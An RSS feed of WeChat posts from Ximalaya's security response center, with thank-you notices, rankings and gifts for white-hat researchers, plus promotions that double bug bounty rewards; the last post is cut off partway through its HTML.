<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>喜马拉雅安全响应平台</title>
    <link>https://wechat2rss.xlab.app/feed/ad318af292cc4ba7c2466b7a2665b18f760c72ae.xml</link>
    <description>喜马拉雅安全响应中心&#xA;(wechat feed made by @ttttmr https://wechat2rss.xlab.app)</description>
    <managingEditor> (喜马拉雅安全响应平台)</managingEditor>
    <image>
      <url>https://wx.qlogo.cn/mmhead/Q3auHgzwzM4XBg1kZ6PwhKnibkNeabCoyYAo3xM1BLP7P8Xoh4umjkA/0</url>
      <title>喜马拉雅安全响应平台</title>
      <link>https://wechat2rss.xlab.app/feed/ad318af292cc4ba7c2466b7a2665b18f760c72ae.xml</link>
    </image>
    <item>
      <title>XMSRC 2025年度年终致谢公告</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI3Mzk4MDQ5NQ==&amp;mid=2247484508&amp;idx=1&amp;sn=311d8655c6e6876ec3be5337649ac87b</link>
      <description>XMSRC 2025年终奖励公告</description>
      <content:encoded><![CDATA[<p><span>XMSRC</span> <span>2026-02-10 18:40</span> <span style="display: inline-block;">上海</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=54fc30c7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FV78icxJPuG7IvJw7YOBibgkW3Ff68UhHb8G4YOIyDHklSV4DFJLHf9yicrm828hjSTkBxo28jGybYtw8PYNXFlRAwwkjf8JocTEby4pJJE2UKg%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>XMSRC 2025年终奖励公告</p>
  <p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-imgfileid="100000859" data-ratio="3.58375" data-s="300,640" type="block" data-type="png" data-w="800" src="https://wechat2rss.xlab.app/img-proxy/?k=5243276b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FV78icxJPuG7KsLgqJg5SPoOBaOJzYojJRJwPaF3GIr2ETJyn1nQbdMAbv23Y43hlz2wpf2Jqwt8TorcUVfHoibghpAy50boxnjy4eycFQh8nM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="%27%27">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=7aa16060&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI3Mzk4MDQ5NQ%3D%3D%26mid%3D2247484508%26idx%3D1%26sn%3D311d8655c6e6876ec3be5337649ac87b">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 10 Feb 2026 18:40:00 +0800</pubDate>
    </item>
    <item>
      <title>XMSRC 2025年中致谢公告</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI3Mzk4MDQ5NQ==&amp;mid=2247484499&amp;idx=1&amp;sn=1f589f10a523e26854c36e2b698d21ea</link>
      <description>XMSRC 2025年中致谢公告</description>
      <content:encoded><![CDATA[<p>
<span>XMSRC</span> <span>2025-06-17 11:51</span> <span style="display: inline-block;">上海</span>
</p>

<p>XMSRC 2025年中致谢公告</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=be6037b4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ib91baOjKw4HLibBua0KryXs0P0QnMXezIvr3nhg5U2T3lHq2I3WOcj17RsyNRQ3UULQXVzOZ518QibA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="box-sizing: border-box;" data-pm-slice="0 0 []"><span leaf="">亲爱的白帽子伙伴们：</span></p><p style="box-sizing: border-box;text-align: left;"><span leaf="">      时光匆匆，又至年中。2025年的上半年，我们在各位白帽子的支持下，共同构建了更加坚固的安全防线。一路走来，感谢每一位师傅们在漏洞挖掘、问题协作、技术创新中付出的努力和汗水～</span></p><p style="box-sizing: border-box;text-align: left;"><span leaf="">      为了感谢大家的辛勤付出，我们特别为</span><strong style="box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">上半年排行前十的师傅</span></span></strong><span leaf=""><span textstyle="" style="font-weight: bold;">准备了一份端午礼盒</span>，向你们表示最诚挚的谢意！<span textstyle="" style="font-weight: bold;">榜单前三名将额外获得一个保温杯盲盒～</span></span></p><p style="box-sizing: border-box;text-align: center;"><span leaf="">榜单如下</span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/bNibSwNU98ib91baOjKw4HLibBua0KryXs0EstP8icukC4ZDeuRfL1uZbreWJn8KYRy7gtjUcPl20ktlBflPEV44eg/640?wx_fmt=png&amp;from=appmsg" data-cropx1="72.1172638436482" data-cropx2="1021.9543973941368" data-cropy1="15.840645081562048" data-cropy2="781.4718240237277" data-imgfileid="100000843" data-ratio="0.8061116965226555" data-s="300,640" type="block" data-type="png" data-w="949" style="width:540px;height:435px;" src="https://wechat2rss.xlab.app/img-proxy/?k=07a928ca&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ib91baOjKw4HLibBua0KryXs0qKO9TXibUNicjKK62ccJzZShBWiasmn3QLY0rNoStZiaiaJPpia4JcxbRvyw%2F640%3Fwx_fmt%3Djpeg"/></p><div><p style="box-sizing: border-box;text-align: center;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;box-sizing: border-box;text-align: center;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-size: 14px;">排名统计周期：2025.01.01——2025.5.30</span></span></p></div><p style="box-sizing: border-box;"><span leaf="">      恭喜上榜的师傅们～<span textstyle="" style="color: rgb(255, 41, 65);font-weight: bold;">请于本周三19:00前联系运营预留收货地址，礼盒将于本周内邮寄</span><span textstyle="" style="color: rgb(255, 41, 65);">～</span></span></p><p style="box-sizing: border-box;"><span data-pm-slice="0 0 []"><span leaf="">      再次感谢每一位白帽子持续在XMSRC平台上贡献安全智慧。不论是寻找高危漏洞，还是提出优化建议，你们都为企业的安全建设提供了强大的力量。而这份努力，也不断激励我们提供更优质的平台服务、搭建更高效的沟通桥梁。</span></span></p><p style="box-sizing: border-box;"><span data-pm-slice="0 0 []"><span leaf="">    未来，XMSRC期待与更多白帽子一起，披荆斩棘，继续守护网络空间的安全与稳定！</span></span></p><p><span leaf=""><br/></span></p><p><span leaf=""><span textstyle="" style="font-size: 12px;">      </span><span textstyle="" style="font-size: 12px;color: rgb(0, 0, 0);">  端午礼盒内含</span></span><span style="caret-color: rgb(51, 51, 51);color: rgb(51, 51, 51);font-family: &#34;Helvetica Neue&#34;, Helvetica, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 微软雅黑, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: auto;text-align: start;text-indent: 0px;text-transform: none;white-space: pre-wrap;widows: auto;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration: none;display: inline !important;float: none;" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="font-size: 12px;color: rgb(0, 0, 0);">多功能时尚包（颜色随机），</span></span><span style="caret-color: rgb(51, 51, 51);color: rgb(51, 51, 51);font-family: &#34;Helvetica Neue&#34;, Helvetica, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 微软雅黑, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: auto;text-align: start;text-indent: 0px;text-transform: none;white-space: pre-wrap;widows: auto;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration: none;display: inline !important;float: none;" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="font-size: 12px;color: rgb(0, 0, 0);"> 特制端午粽*2，</span></span><span style="caret-color: rgb(51, 51, 51);color: rgb(51, 51, 51);font-family: &#34;Helvetica Neue&#34;, Helvetica, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 微软雅黑, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: auto;text-align: start;text-indent: 0px;text-transform: none;white-space: pre-wrap;widows: auto;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration: none;display: inline !important;float: none;" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="font-size: 12px;color: rgb(0, 0, 0);">喜马限定款挂件，扫码查看更多详情～</span></span></span></span></span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img js_insertlocalimg" data-imgfileid="100000849" data-ratio="1" data-s="300,640" type="block" data-type="png" data-w="400" style="width:144px;height:144px;" src="https://wechat2rss.xlab.app/img-proxy/?k=5c5f0cc9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ib91baOjKw4HLibBua0KryXs0fzOoEvHxqLwo7Jia59Lo5zTFfO82ib0rrbJxox6rJUMIWLPVWNCG4OPw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="caret-color: rgb(51, 51, 51);color: rgb(51, 51, 51);font-family: &#34;Helvetica Neue&#34;, Helvetica, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 微软雅黑, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: auto;text-align: start;text-indent: 0px;text-transform: none;white-space: pre-wrap;widows: auto;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration: none;display: inline !important;float: none;" data-pm-slice="0 0 []"><span style="caret-color: rgb(51, 51, 51);color: rgb(51, 51, 51);font-family: &#34;Helvetica Neue&#34;, Helvetica, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 微软雅黑, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: auto;text-align: start;text-indent: 0px;text-transform: none;white-space: pre-wrap;widows: auto;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration: none;display: inline !important;float: none;" data-pm-slice="0 0 []"><span style="caret-color: rgb(51, 51, 51);color: rgb(51, 51, 51);font-family: &#34;Helvetica Neue&#34;, Helvetica, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 微软雅黑, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: auto;text-align: start;text-indent: 0px;text-transform: none;white-space: pre-wrap;widows: auto;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration: none;display: inline !important;float: none;" data-pm-slice="0 0 []"><span leaf=""><br/></span></span></span></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=07a928ca&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ib91baOjKw4HLibBua0KryXs0qKO9TXibUNicjKK62ccJzZShBWiasmn3QLY0rNoStZiaiaJPpia4JcxbRvyw%2F640%3Fwx_fmt%3Djpeg"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=7fce6aaf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ib91baOjKw4HLibBua0KryXs0fzOoEvHxqLwo7Jia59Lo5zTFfO82ib0rrbJxox6rJUMIWLPVWNCG4OPw%2F640%3Fwx_fmt%3Dpng"/></p>



<p><a href="2247484499">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=2e4a541c&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI3Mzk4MDQ5NQ%3D%3D%26mid%3D2247484499%26idx%3D1%26sn%3D1f589f10a523e26854c36e2b698d21ea">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 17 Jun 2025 11:51:00 +0800</pubDate>
    </item>
    <item>
      <title>【春日双倍活动】专项众测-高危漏洞突击战</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI3Mzk4MDQ5NQ==&amp;mid=2247484489&amp;idx=1&amp;sn=5dfebcfd86fb7f56331edd5f8e9805cb</link>
      <description>春归万物生，漏洞无处藏！值此安全焕新季，SRC平台开启「春日双倍活动」，诚邀白帽子聚焦服务器、数据泄漏高危漏洞，提交有效漏洞即可享双倍奖励！用技术唤醒安全生机，让挖洞更有“春意”！</description>
      <content:encoded><![CDATA[<p>
<span>XMSRC</span> <span>2025-03-10 16:21</span> <span style="display: inline-block;">上海</span>
</p>

<p>春归万物生，漏洞无处藏！值此安全焕新季，SRC平台开启「春日双倍活动」，诚邀白帽子聚焦服务器、数据泄漏高危漏洞，提交有效漏洞即可享双倍奖励！用技术唤醒安全生机，让挖洞更有“春意”！</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=92bac29f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ib9J4rSQRdTia3JxE0cU3g2bE1vSE2ibRqwKUzIkxhfL2pYpL9bt7dZlsotB61NDy0FM8qN0JovcCQUw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-imgfileid="100000837" data-ratio="2.4990740740740742" data-s="300,640" style="" data-type="jpeg" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=7ddd91d1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ib9J4rSQRdTia3JxE0cU3g2bEtDUuIwCklyiaysLibHWzoLyqRVWETqFTiaOBxtcRQawf3hdw6kggL4TGQ%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484489">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=db34021c&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI3Mzk4MDQ5NQ%3D%3D%26mid%3D2247484489%26idx%3D1%26sn%3D5dfebcfd86fb7f56331edd5f8e9805cb%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 10 Mar 2025 16:21:00 +0800</pubDate>
    </item>
    <item>
      <title>XMSRC  2024年度年终致谢公告</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI3Mzk4MDQ5NQ==&amp;mid=2247484482&amp;idx=1&amp;sn=548860af551769c3564afd2a601a3197</link>
      <description>2024年终奖和新年礼盒来啦，快来查收～</description>
      <content:encoded><![CDATA[<p>
<span>XMSRC</span> <span>2025-01-17 14:14</span> <span style="display: inline-block;">上海</span>
</p>

<p>2024年终奖和新年礼盒来啦，快来查收～</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=01be16c5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ibic0thQgHIgRay7lEic1cVMJ6WbDlgN5n1z8vo7NqecDZ7vpqOpMXq1Qew8D3rRx5PqUGia5lxqvYy7w%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000833" data-ratio="3.75" data-s="300,640" style="" data-type="jpeg" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=d3f27f83&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ib9bSfvEwbAFU1tjicz0KhLX1zaB2ILt1xDV0Xib9azZOyPGlwyPBLq6eOicWzQrVUW4MJWWUGQ2fXBibg%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484482">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=cda8d61e&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI3Mzk4MDQ5NQ%3D%3D%26mid%3D2247484482%26idx%3D1%26sn%3D548860af551769c3564afd2a601a3197%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 17 Jan 2025 14:14:00 +0800</pubDate>
    </item>
    <item>
      <title>秋日福利大放送，挖洞奖励享翻倍！</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI3Mzk4MDQ5NQ==&amp;mid=2247484473&amp;idx=1&amp;sn=9437b5f82c3f258681261e2972002e66</link>
      <description></description>
      <content:encoded><![CDATA[<p>
原创 <span>XMSRC</span> <span>2024-10-21 16:15</span> <span style="display: inline-block;">上海</span>
</p>

<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=5e9bf199&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FbNibSwNU98ib9xyN8dKcWJ25CiaQKiaLYXfr4T4ic7TdOMp8Ey5PHufN7WB0Q9R8XqPS0s0rwrR76ZOic9emCiaG3FIfg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-role="outer" style="background-repeat: repeat;background-position: center center;background-color: rgb(205, 234, 255);background-size: auto;background-image: none;" data-tplid="129130" data-style="background-repeat: repeat; background-position: center center; background-color: rgb(205, 234, 255); background-size: auto; background-image: none;" class="js_darkmode__0" data-mpa-powered-by="yiban.io"><section><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-imgfileid="100000824" data-ratio="0.4255555555555556" data-s="300,640" style="" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=d250a6e5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ib9xyN8dKcWJ25CiaQKiaLYXfrEfNq1WWe8Xs7hAzOlXrLgqeJfFXPvrRYuzInmxctnStcb2xqUtu54Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><section style="line-height: 3em;"><br/></section></section><section style="line-height: 3em;"><section style="margin: 10px auto;display: flex;justify-content: center;"><section><section style="display: flex;justify-content: center;margin-bottom: -6px;"><section style="width: 35px;height: 0px;overflow: hidden;"><br/></section></section><section style="border-radius: 5px;background-color: rgb(255, 225, 135);padding: 4px;" data-style="border-radius: 5px; background-color: rgb(255, 225, 135); padding: 4px;" class="js_darkmode__1"><section style="background-color: rgb(255, 255, 255);border-radius: 5px;padding: 4px 15px;" data-style="background-color: rgb(255, 255, 255); border-radius: 5px; padding: 4px 15px;" class="js_darkmode__2"><p style="line-height:2.5em;"><span style="letter-spacing: 0.5px;color: rgb(0, 0, 0);font-family: 黑体, SimHei;font-size: 24px;"><strong>活动内容</strong></span></p></section></section></section></section></section><section data-tools="135编辑器" data-id="128736" data-width="90%" style="margin-left: auto;margin-right: auto;width: 90%;flex: 0 0 90%;max-width: 90% !important;"><section style="background-color: rgb(242, 249, 255);padding-right: 10px;padding-bottom: 10px;padding-left: 10px;line-height: 3em;" data-style="background-color: rgb(242, 249, 255); padding-right: 10px; padding-bottom: 10px; padding-left: 10px; line-height: 3em;" class="js_darkmode__4"><section style="display: flex;justify-content: space-around;align-items: flex-start;transform:                                    translateY(-2px);-webkit-transform:                                    translateY(-2px);-moz-transform:                                    translateY(-2px);-o-transform:                                    translateY(-2px);"><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__5"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__6"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__7"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__8"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__9"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__10"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__11"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__12"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__13"><br/></section><section style="width: 15px;height: 10px;border-radius: 0px 0px 15px 15px;background-color: rgb(205, 234, 255);overflow: hidden;" data-style="width: 15px; height: 10px; border-radius: 0px 0px 15px 15px; background-color: rgb(205, 234, 255); overflow: hidden;" class="js_darkmode__14"><br/></section></section></section><section style="background-color: rgb(255, 255, 255);padding: 5px 10px;" data-style="background-color: rgb(255, 255, 255); padding: 5px 10px;" class="js_darkmode__15"><section><section><section style="line-height: 1.75em;font-size: 14px;letter-spacing: 1.5px;color: rgb(63, 63, 63);" data-autoskip="1" data-style="line-height: 1.75em; font-size: 14px; letter-spacing: 1.5px; color: rgb(63, 63, 63);" class="js_darkmode__16"><p style="text-align: left;background-image: initial;background-position: initial;background-size: initial;background-repeat: initial;background-attachment: initial;background-origin: initial;background-clip: initial;text-indent: 0em;line-height: normal;"><span style="color: rgb(0, 0, 0);letter-spacing: 0.5px;" data-style="color: rgb(0, 0, 0); letter-spacing: 0.5px;" class="js_darkmode__17"><strong><span style="background-image: initial;background-position: initial;background-size: initial;background-repeat: initial;background-attachment: initial;background-origin: initial;background-clip: initial;font-family: 黑体, SimHei;" data-style="color: rgb(0, 0, 0); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; font-size: 20px; font-family: 黑体, SimHei;" class="js_darkmode__18 js_darkmode__text__3"><span style="color: rgb(0, 0, 0);letter-spacing: 0.5px;background-image: initial;background-position: initial;background-size: initial;background-repeat: initial;background-attachment: initial;background-origin: initial;background-clip: initial;font-family: 黑体, SimHei;font-size: 10px;"></span></span></strong></span></p><section data-mpa-template="t" mpa-from-tpl="t"><section data-mpa-template="t" mpa-from-tpl="t"><p style="margin-left: 8px;margin-right: 8px;visibility: visible;"><strong style="visibility: visible;" mpa-from-tpl="t"><span style="color: rgb(34, 34, 34);font-family: PingFangSC-Light;font-size: 20px;visibility: visible;" data-style="color: rgb(34, 34, 34); font-family: PingFangSC-Light; font-size: 20px;" class="js_darkmode__11"><span data-mpa-emphasize-underline="t" style="display: inline-table;box-sizing: border-box;transform-style: preserve-3d;text-indent: 0em;visibility: visible;"><span style="font-size: 20px;color: rgb(34, 34, 34);transform: translate3d(0px, 0px, 1px);display: inline-block;font-weight: bold;visibility: visible;" data-style="font-size: 20px; color: rgb(34, 34, 34); transform: translate3d(0px, 0px, 1px); display: inline-block; font-weight: bold;" class="js_darkmode__12" mpa-is-content="t">活动时间：</span><span data-mpa-emphasize-underline-bg-line="t" style="width: 100%;height: 6px;background-color: rgb(248, 206, 64);display: block;border-radius: 2px;margin-top: -6px;transform: translate3d(0px, -4px, 0px);visibility: visible;" data-style="width: 100%; height: 6px; background-color: rgb(248, 206, 64); display: block; border-radius: 2px; margin-top: -6px; transform: translate3d(0px, -4px, 0px);" class="js_darkmode__13"></span></span></span></strong></p></section></section><section style="text-align: left;background-image: initial;background-position: initial;background-size: initial;background-repeat: initial;background-attachment: initial;background-origin: initial;background-clip: initial;text-indent: 0em;line-height: 3em;"><span style="color: rgb(0, 0, 0);letter-spacing: 0.5px;" data-style="color: rgb(0, 0, 0); letter-spacing: 0.5px;" class="js_darkmode__17"><strong><span style="background-image: initial;background-position: initial;background-size: initial;background-repeat: initial;background-attachment: initial;background-origin: initial;background-clip: initial;font-size: 20px;font-family: 黑体, SimHei;" data-style="color: rgb(0, 0, 0); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; font-size: 20px; font-family: 黑体, SimHei;" class="js_darkmode__18 js_darkmode__text__3"></span></strong></span></section></section><section style="font-size: 12pt;font-family: Calibri, sans-serif;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;background: none center center / auto repeat rgb(255, 255, 255);line-height: 3em;padding: 5px 10px;margin-left: auto;margin-right: auto;width: 90%;flex: 0 0 90%;text-align: justify;text-indent: 0em;max-width: 90% !important;" data-style="font-size: 12pt; font-family: Calibri, sans-serif; color: rgb(0, 0, 0); letter-spacing: normal; text-align: justify; background: white; margin: 0px; text-indent: 2em; line-height: 3em;" class="js_darkmode__19"><span style="font-size: 13px;letter-spacing: 0.5px;text-indent: 2em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">2024年</span><strong><span style="letter-spacing: 0.5px;text-indent: 2em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 13px;color: rgb(255, 41, 65);">10月22日00:00</span></strong><span style="font-size: 13px;"><span style="font-size: 13px;letter-spacing: 0.5px;text-indent: 2em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"> – 2024年</span><strong><span style="font-size: 13px;letter-spacing: 0.5px;text-indent: 2em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;color: rgb(255, 41, 65);">11月22日24:00</span></strong></span></section><section style="line-height: 1.75em;font-size: 14px;letter-spacing: 1.5px;color: rgb(63, 63, 63);" data-autoskip="1" data-style="line-height: 1.75em; font-size: 14px; letter-spacing: 1.5px; color: rgb(63, 63, 63);" class="js_darkmode__21"><section data-mpa-template="t" mpa-from-tpl="t"><section data-mpa-template="t" mpa-from-tpl="t"><p style="margin-left: 8px;margin-right: 8px;visibility: visible;"><strong style="visibility: visible;" mpa-from-tpl="t"><span style="color: rgb(34, 34, 34);font-family: PingFangSC-Light;font-size: 20px;visibility: visible;" data-style="color: rgb(34, 34, 34); font-family: PingFangSC-Light; font-size: 20px;" class="js_darkmode__11"><span data-mpa-emphasize-underline="t" style="display: inline-table;box-sizing: border-box;transform-style: preserve-3d;text-indent: 0em;visibility: visible;"><span style="font-size: 20px;color: rgb(34, 34, 34);transform: translate3d(0px, 0px, 1px);display: inline-block;font-weight: bold;visibility: visible;" data-style="font-size: 20px; color: rgb(34, 34, 34); transform: translate3d(0px, 0px, 1px); display: inline-block; font-weight: bold;" class="js_darkmode__12" mpa-is-content="t">活动范围：</span><span data-mpa-emphasize-underline-bg-line="t" style="width: 100%;height: 6px;background-color: rgb(248, 206, 64);display: block;border-radius: 2px;margin-top: -6px;transform: translate3d(0px, -4px, 0px);visibility: visible;" data-style="width: 100%; height: 6px; background-color: rgb(248, 206, 64); display: block; border-radius: 2px; margin-top: -6px; transform: translate3d(0px, -4px, 0px);" class="js_darkmode__13"><br/></span></span></span></strong></p></section></section><section style="font-size: 12pt;font-family: Calibri, sans-serif;color: rgb(0, 0, 0);letter-spacing: 